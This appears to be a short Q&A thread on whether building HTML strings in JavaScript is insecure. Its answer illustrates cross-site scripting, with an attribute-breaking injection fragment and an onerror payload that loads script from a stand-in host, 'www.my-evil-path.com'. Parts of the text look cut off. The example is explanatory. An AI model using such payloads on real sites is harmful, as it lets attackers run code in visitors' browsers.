Is it really insecure to build HTML strings in Javascript?

Question

The company who hosts our site reviews our code before deploying - they\'ve recently told us this:

HTML strings should never be directly manipulated,

Answer 1

As you cannot inject script tags in modern browsers using .innerHTML you will need to listen to an event:

If this.au is somehow modified, it might contain something like this:

">Click to play

And ofcause to run bigger chunks of JavaScript set onerror to:

var d = document; s = d.createElement('script'); s.type='text/javascript'; s.src = 'www.my-evil-path.com'; d.body.appendChild(s);

Thanks to Scimoster for the boilerplate